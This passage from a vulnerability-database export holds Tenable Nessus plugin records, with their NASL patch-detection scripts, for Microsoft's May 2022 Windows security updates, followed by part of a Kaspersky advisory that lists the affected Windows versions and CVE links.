script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-05';\nkbs = make_list(\n '5013944'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n os_build:20348,\n rollup_date:'05_2022',\n bulletin:bulletin,\n rollup_kb_list:[5013944])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-20T16:44:45", "description": "The remote Windows host is missing security update 5013941. It is, therefore, affected by multiple vulnerabilities\n\n - Windows LDAP Remote Code Execution Vulnerability (CVE-2022-22012, CVE-2022-22013, CVE-2022-22014, CVE-2022-29128, CVE-2022-29129, CVE-2022-29130, CVE-2022-29131, CVE-2022-29137, CVE-2022-29139, CVE-2022-29141)\n\n - Windows Network File System Remote Code Execution Vulnerability (CVE-2022-26937)\n\n - Windows Graphics Component Remote Code Execution Vulnerability (CVE-2022-26927)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-10T00:00:00", "type": "nessus", "title": "KB5013941: Windows 10 version 1809 / Windows Server 2019 Security Update (May 2022)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21972", "CVE-2022-22011", "CVE-2022-22012", "CVE-2022-22013", "CVE-2022-22014", "CVE-2022-22015", "CVE-2022-22016", "CVE-2022-22019", "CVE-2022-23270", "CVE-2022-24466", "CVE-2022-26913", "CVE-2022-26923", "CVE-2022-26925", "CVE-2022-26926", "CVE-2022-26927", "CVE-2022-26930", "CVE-2022-26931", "CVE-2022-26932", "CVE-2022-26933", "CVE-2022-26934", "CVE-2022-26935", "CVE-2022-26936", "CVE-2022-26937", "CVE-2022-26938", "CVE-2022-26939", "CVE-2022-29102", "CVE-2022-29103", "CVE-2022-29104", "CVE-2022-29105", "CVE-2022-29106", "CVE-2022-29112", "CVE-2022-29113", "CVE-2022-29114", "CVE-2022-29115", "CVE-2022-29120", "CVE-2022-29121", "CVE-2022-29122", "CVE-2022-29123", "CVE-2022-29125", "CVE-2022-29126", "CVE-2022-29127", "CVE-2022-29128", "CVE-2022-29129", "CVE-2022-29130", "CVE-2022-29131", "CVE-2022-29132", "CVE-2022-29134", "CVE-2022-29135", "CVE-2022-29137", "CVE-2022-29138", "CVE-2022-29139", "CVE-2022-29140", "CVE-2022-29141", "CVE-2022-29142", "CVE-2022-29150", "CVE-2022-29151", "CVE-2022-30138"], "modified": "2022-08-19T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_MAY_5013941.NASL", "href": "https://www.tenable.com/plugins/nessus/160928", "sourceData": "##\n# (C) Tenable, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(160928);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/08/19\");\n\n script_cve_id(\n \"CVE-2022-21972\",\n \"CVE-2022-22011\",\n \"CVE-2022-22012\",\n \"CVE-2022-22013\",\n \"CVE-2022-22014\",\n \"CVE-2022-22015\",\n \"CVE-2022-22016\",\n \"CVE-2022-22019\",\n \"CVE-2022-23270\",\n \"CVE-2022-24466\",\n \"CVE-2022-26913\",\n \"CVE-2022-26923\",\n \"CVE-2022-26925\",\n \"CVE-2022-26926\",\n \"CVE-2022-26927\",\n \"CVE-2022-26930\",\n \"CVE-2022-26931\",\n \"CVE-2022-26932\",\n \"CVE-2022-26933\",\n \"CVE-2022-26934\",\n \"CVE-2022-26935\",\n \"CVE-2022-26936\",\n \"CVE-2022-26937\",\n \"CVE-2022-26938\",\n \"CVE-2022-26939\",\n \"CVE-2022-29102\",\n \"CVE-2022-29103\",\n \"CVE-2022-29104\",\n \"CVE-2022-29105\",\n \"CVE-2022-29106\",\n \"CVE-2022-29112\",\n \"CVE-2022-29113\",\n \"CVE-2022-29114\",\n \"CVE-2022-29115\",\n \"CVE-2022-29120\",\n \"CVE-2022-29121\",\n \"CVE-2022-29122\",\n \"CVE-2022-29123\",\n \"CVE-2022-29125\",\n \"CVE-2022-29126\",\n \"CVE-2022-29127\",\n \"CVE-2022-29128\",\n \"CVE-2022-29129\",\n \"CVE-2022-29130\",\n \"CVE-2022-29131\",\n \"CVE-2022-29132\",\n \"CVE-2022-29134\",\n \"CVE-2022-29135\",\n \"CVE-2022-29137\",\n \"CVE-2022-29138\",\n \"CVE-2022-29139\",\n \"CVE-2022-29140\",\n \"CVE-2022-29141\",\n \"CVE-2022-29142\",\n \"CVE-2022-29150\",\n \"CVE-2022-29151\",\n \"CVE-2022-30138\"\n );\n script_xref(name:\"MSKB\", value:\"5013941\");\n script_xref(name:\"MSFT\", value:\"MS22-5013941\");\n script_xref(name:\"IAVA\", value:\"2022-A-0204-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0203-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/22\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/09/08\");\n\n script_name(english:\"KB5013941: Windows 10 version 1809 / Windows Server 2019 Security Update (May 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5013941. It is, therefore, affected by multiple vulnerabilities\n\n - Windows LDAP Remote Code Execution Vulnerability (CVE-2022-22012, CVE-2022-22013, CVE-2022-22014,\n CVE-2022-29128, CVE-2022-29129, CVE-2022-29130, CVE-2022-29131, CVE-2022-29137, CVE-2022-29139,\n CVE-2022-29141)\n\n - Windows Network File System Remote Code Execution Vulnerability (CVE-2022-26937)\n\n - Windows Graphics Component Remote Code Execution Vulnerability (CVE-2022-26927)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5013941\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5013941\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-29130\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/05/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/05/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/05/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"false\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-05';\nkbs = make_list(\n '5013941'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n os_build:17763,\n rollup_date:'05_2022',\n bulletin:bulletin,\n rollup_kb_list:[5013941])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-20T00:26:42", "description": "The remote Windows host is missing security update 5013942. It is, therefore, affected by multiple vulnerabilities\n\n - Windows LDAP Remote Code Execution Vulnerability (CVE-2022-22012, CVE-2022-22013, CVE-2022-22014, CVE-2022-29128, CVE-2022-29129, CVE-2022-29130, CVE-2022-29131, CVE-2022-29137, CVE-2022-29139, CVE-2022-29141)\n\n - Windows Network File System Remote Code Execution Vulnerability (CVE-2022-26937)\n\n - Windows Graphics Component Remote Code Execution Vulnerability (CVE-2022-26927)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-10T00:00:00", "type": "nessus", "title": "KB5013942: Windows 10 Version 20H2 / 21H1 / 21H2 Security Update (May 2022)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21972", "CVE-2022-22011", "CVE-2022-22012", "CVE-2022-22013", "CVE-2022-22014", "CVE-2022-22015", "CVE-2022-22016", "CVE-2022-22019", "CVE-2022-22713", "CVE-2022-23270", "CVE-2022-23279", "CVE-2022-24466", "CVE-2022-26913", "CVE-2022-26923", "CVE-2022-26925", "CVE-2022-26926", "CVE-2022-26927", "CVE-2022-26930", "CVE-2022-26931", "CVE-2022-26932", "CVE-2022-26933", "CVE-2022-26934", "CVE-2022-26935", "CVE-2022-26936", "CVE-2022-26937", "CVE-2022-26938", "CVE-2022-26939", "CVE-2022-29102", "CVE-2022-29103", "CVE-2022-29104", "CVE-2022-29105", "CVE-2022-29106", "CVE-2022-29112", "CVE-2022-29113", "CVE-2022-29114", "CVE-2022-29115", "CVE-2022-29120", "CVE-2022-29121", "CVE-2022-29122", "CVE-2022-29123", "CVE-2022-29125", "CVE-2022-29126", "CVE-2022-29127", "CVE-2022-29128", "CVE-2022-29129", "CVE-2022-29130", "CVE-2022-29131", "CVE-2022-29132", "CVE-2022-29134", "CVE-2022-29135", "CVE-2022-29137", "CVE-2022-29138", "CVE-2022-29139", "CVE-2022-29140", "CVE-2022-29141", "CVE-2022-29142", "CVE-2022-29150", "CVE-2022-29151", "CVE-2022-30138"], "modified": "2022-08-19T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_MAY_5013942.NASL", "href": "https://www.tenable.com/plugins/nessus/160927", "sourceData": "##\n# (C) Tenable, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(160927);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/08/19\");\n\n script_cve_id(\n \"CVE-2022-21972\",\n \"CVE-2022-22011\",\n \"CVE-2022-22012\",\n \"CVE-2022-22013\",\n \"CVE-2022-22014\",\n \"CVE-2022-22015\",\n \"CVE-2022-22016\",\n \"CVE-2022-22019\",\n \"CVE-2022-22713\",\n \"CVE-2022-23270\",\n \"CVE-2022-23279\",\n \"CVE-2022-24466\",\n \"CVE-2022-26913\",\n \"CVE-2022-26923\",\n \"CVE-2022-26925\",\n \"CVE-2022-26926\",\n \"CVE-2022-26927\",\n \"CVE-2022-26930\",\n \"CVE-2022-26931\",\n \"CVE-2022-26932\",\n \"CVE-2022-26933\",\n \"CVE-2022-26934\",\n \"CVE-2022-26935\",\n \"CVE-2022-26936\",\n \"CVE-2022-26937\",\n \"CVE-2022-26938\",\n \"CVE-2022-26939\",\n \"CVE-2022-29102\",\n \"CVE-2022-29103\",\n \"CVE-2022-29104\",\n \"CVE-2022-29105\",\n \"CVE-2022-29106\",\n \"CVE-2022-29112\",\n \"CVE-2022-29113\",\n \"CVE-2022-29114\",\n \"CVE-2022-29115\",\n \"CVE-2022-29120\",\n \"CVE-2022-29121\",\n \"CVE-2022-29122\",\n \"CVE-2022-29123\",\n \"CVE-2022-29125\",\n \"CVE-2022-29126\",\n \"CVE-2022-29127\",\n \"CVE-2022-29128\",\n \"CVE-2022-29129\",\n \"CVE-2022-29130\",\n \"CVE-2022-29131\",\n \"CVE-2022-29132\",\n \"CVE-2022-29134\",\n \"CVE-2022-29135\",\n \"CVE-2022-29137\",\n \"CVE-2022-29138\",\n \"CVE-2022-29139\",\n \"CVE-2022-29140\",\n \"CVE-2022-29141\",\n \"CVE-2022-29142\",\n \"CVE-2022-29150\",\n \"CVE-2022-29151\",\n \"CVE-2022-30138\"\n );\n script_xref(name:\"MSKB\", value:\"5013942\");\n script_xref(name:\"MSFT\", value:\"MS22-5013942\");\n script_xref(name:\"IAVA\", value:\"2022-A-0204-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0203-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/22\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/09/08\");\n\n script_name(english:\"KB5013942: Windows 10 Version 20H2 / 21H1 / 21H2 Security Update (May 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5013942. It is, therefore, affected by multiple vulnerabilities\n\n - Windows LDAP Remote Code Execution Vulnerability (CVE-2022-22012, CVE-2022-22013, CVE-2022-22014,\n CVE-2022-29128, CVE-2022-29129, CVE-2022-29130, CVE-2022-29131, CVE-2022-29137, CVE-2022-29139,\n CVE-2022-29141)\n\n - Windows Network File System Remote Code Execution Vulnerability (CVE-2022-26937)\n\n - Windows Graphics Component Remote Code Execution Vulnerability (CVE-2022-26927)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5013942\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5013942\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-29130\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/05/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/05/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/05/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"false\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-05';\nkbs = make_list(\n '5013942'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n os_build:19042,\n rollup_date:'05_2022',\n bulletin:bulletin,\n rollup_kb_list:[5013942])\n|| smb_check_rollup(os:'10',\n os_build:19043,\n rollup_date:'05_2022',\n bulletin:bulletin,\n rollup_kb_list:[5013942])\n|| smb_check_rollup(os:'10',\n os_build:19044,\n rollup_date:'05_2022',\n bulletin:bulletin,\n rollup_kb_list:[5013942])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2022-10-18T08:16:09", "description": "### *Detect date*:\n05/10/2022\n\n### *Severity*:\nHigh\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Windows. Malicious users can exploit these vulnerabilities to execute arbitrary code, obtain sensitive information, bypass security restrictions, gain privileges, cause denial of service, spoof user interface.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nWindows 10 Version 20H2 for ARM64-based Systems \nWindows Server 2019 (Server Core installation) \nWindows 10 Version 1809 for 32-bit Systems \nWindows 10 Version 20H2 for x64-based Systems \nWindows 8.1 for 32-bit systems \nWindows 10 Version 21H1 for 32-bit Systems \nWindows 10 Version 1909 for x64-based Systems \nWindows 10 Version 1809 for x64-based Systems \nWindows Server 2012 R2 \nWindows 10 Version 1909 for ARM64-based Systems \nWindows Server 2016 \nWindows Server, version 20H2 (Server Core Installation) \nWindows Server 2019 \nWindows 10 Version 21H2 for 32-bit Systems \nWindows Server 2012 (Server Core installation) \nWindows Server 2016 (Server Core installation) \nWindows 10 Version 1909 for 32-bit Systems \nWindows 10 for x64-based Systems \nWindows 10 Version 21H1 for ARM64-based Systems \nWindows RT 8.1 \nWindows Server 2022 \nWindows 10 Version 21H1 for x64-based Systems \nWindows 10 Version 1607 for 32-bit Systems \nWindows Server 2022 (Server Core installation) \nWindows 10 Version 21H2 for ARM64-based Systems \nWindows 11 for ARM64-based Systems \nWindows 11 for x64-based Systems \nWindows 10 for 32-bit Systems \nWindows Server 2012 \nWindows 10 Version 21H2 for x64-based Systems \nWindows 10 Version 1809 for ARM64-based Systems \nWindows 8.1 for x64-based systems \nWindows 10 Version 1607 for x64-based Systems \nWindows Server 2012 R2 (Server Core installation) \nWindows 10 Version 20H2 for 32-bit Systems\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2022-29137](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29137>) \n[CVE-2022-29140](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29140>) \n[CVE-2022-29106](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29106>) \n[CVE-2022-29127](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29127>) \n[CVE-2022-22019](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22019>) \n[CVE-2022-22017](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22017>) \n[CVE-2022-29104](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29104>) \n[CVE-2022-29102](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29102>) \n[CVE-2022-29151](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29151>) \n[CVE-2022-29129](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29129>) \n[CVE-2022-29122](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29122>) \n[CVE-2022-29150](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29150>) \n[CVE-2022-29132](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29132>) \n[CVE-2022-29130](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29130>) \n[CVE-2022-26927](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26927>) \n[CVE-2022-26925](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26925>) \n[CVE-2022-29105](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29105>) \n[CVE-2022-29113](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29113>) \n[CVE-2022-22011](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22011>) \n[CVE-2022-29128](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29128>) \n[CVE-2022-23279](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-23279>) \n[CVE-2022-22014](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22014>) \n[CVE-2022-29133](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29133>) \n[CVE-2022-29131](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29131>) \n[CVE-2022-26936](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26936>) \n[CVE-2022-29115](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29115>) \n[CVE-2022-22012](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22012>) \n[CVE-2022-26931](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26931>) \n[CVE-2022-22013](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22013>) \n[CVE-2022-29125](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29125>) \n[CVE-2022-29139](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29139>) \n[CVE-2022-29141](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29141>) \n[CVE-2022-22713](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22713>) \n[CVE-2022-29138](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29138>) \n[CVE-2022-29112](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29112>) \n[CVE-2022-29103](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29103>) \n[CVE-2022-26937](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26937>) \n[CVE-2022-22015](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22015>) \n[CVE-2022-26933](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26933>) \n[CVE-2022-29135](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29135>) \n[CVE-2022-24466](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24466>) \n[CVE-2022-26940](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26940>) \n[CVE-2022-29134](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29134>) \n[CVE-2022-26913](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26913>) \n[CVE-2022-26938](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26938>) \n[CVE-2022-26926](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26926>) \n[CVE-2022-22016](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22016>) \n[CVE-2022-23270](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-23270>) \n[CVE-2022-29142](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29142>) \n[CVE-2022-29121](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29121>) \n[CVE-2022-21972](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21972>) \n[CVE-2022-26923](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26923>) \n[CVE-2022-26930](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26930>) \n[CVE-2022-29123](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29123>) \n[CVE-2022-29120](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29120>) \n[CVE-2022-26935](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26935>) \n[CVE-2022-29126](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29126>) \n[CVE-2022-29114](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29114>) \n[CVE-2022-29116](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29116>) \n[CVE-2022-26934](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26934>) \n[CVE-2022-26932](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26932>) \n[CVE-2022-26939](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26939>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *KB 